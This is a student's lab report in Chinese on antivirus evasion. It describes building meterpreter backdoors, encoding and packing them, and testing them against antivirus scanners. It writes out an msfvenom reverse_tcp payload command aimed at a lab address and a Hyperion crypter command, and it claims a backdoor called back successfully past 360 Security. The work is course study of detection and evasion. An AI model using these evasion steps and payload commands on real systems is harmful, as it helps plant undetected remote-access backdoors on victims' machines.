2018-2019-3 網絡對抗技術 20165305 Exp3 免殺原理與實踐

1.實驗內容及步驟

---

1.1 正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，加殼工具，使用shellcode編程

---

將作實驗二時生成的後門文件用virustotal網站檢測，結果如圖：

1.1.1正確使用msf編碼器
使用msfvenom指令進行屢次編碼，結果如圖：

1.1.2 msfvenom生成jar之類的其餘文件文件
（1）使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5305 x> sxx_backdoor_java.jar生成jar文件。
檢測結果如圖所示：

（2）生成.apk後門程序
檢測結果如圖所示：

1.1.3使用veil-evasion生成後門程序並檢測
啓動veil-evasion，輸入指令進入配置界面設置反彈鏈接IP和端口號，而後輸入命令生成文件並設置文件名。（文件會保存到默認的路徑下）

檢測結果以下·：

1.1.4 Shellcode注入
（1）先生成C語言格式的shellcode數組，如圖

（2）生成一個.c文件，將生成的shellcode數組寫入程序中。
（3）在kali下將這個.c文件編譯成爲.exe可執行文件
如圖：

（4）檢測結果如圖：

（5）用360查殺，如圖：

1.1.5使用加殼工具
加殼可分爲三種：

• 壓縮殼
  減小應用體積，如ASPack，UPX
  
• 加密殼
  版權保護，反跟蹤。如ASProtect,Armadillo
  
• 虛擬機
  經過相似編譯手段，將應用指令轉換爲本身設計的指令集。如VMProtect, Themida

（1）壓縮殼
使用指令將.exe可執行文件壓縮。
結果如圖：

檢測結果如圖：

驗證反彈鏈接結果：

（2）加密殼

• 將上一個生成的文件拷貝到/usr/share/windows-binaries/hyperion/目錄中
  
• 進入目錄/usr/share/windows-binaries/hyperion/中
  
• 輸入命令wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe進行加殼。
  結果如圖：
  

1.2 經過組合應用各類技術實現惡意代碼免殺

---

• 一種方法不可以達到免殺的目的，因此嘗試一下多種組合可否成功。
  半手工製做shellcode，加殼。
  測試反彈鏈接：
  

查殺結果：

1.3用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

---

電腦win7，殺軟360安全衛士，版本號11.5.0.2002
截圖：

2.報告內容

---

2.1.基礎問題回答

---

（1）殺軟是如何檢測出惡意代碼的？
根據行爲進行檢測
根據文件的特徵值進行分析
啓發式惡意軟件檢測
（2）免殺是作什麼？
經過一些方法，使惡意文件不被殺軟查出來。
（3）免殺的基本方法有哪些？
加殼、修改文件的特徵碼等。

2.2.開啓殺軟能絕對防止電腦中惡意代碼嗎？

---

不能。惡意代碼層出不窮，咱們須要常常更新殺軟，這樣咱們才能用殺軟防護一些沒有見過的惡意代碼。

2.3.實踐總結與體會

---

本次實驗我主要是卡在了veil軟件的安裝，我安裝了好長時間。本次的實驗我最大的收穫是提升了本身對於惡意軟件的防範意識和能力，認識到了殺軟並非萬能的，因此咱們在平常生活中，若是須要下載軟件，最好仍是要到官網下載。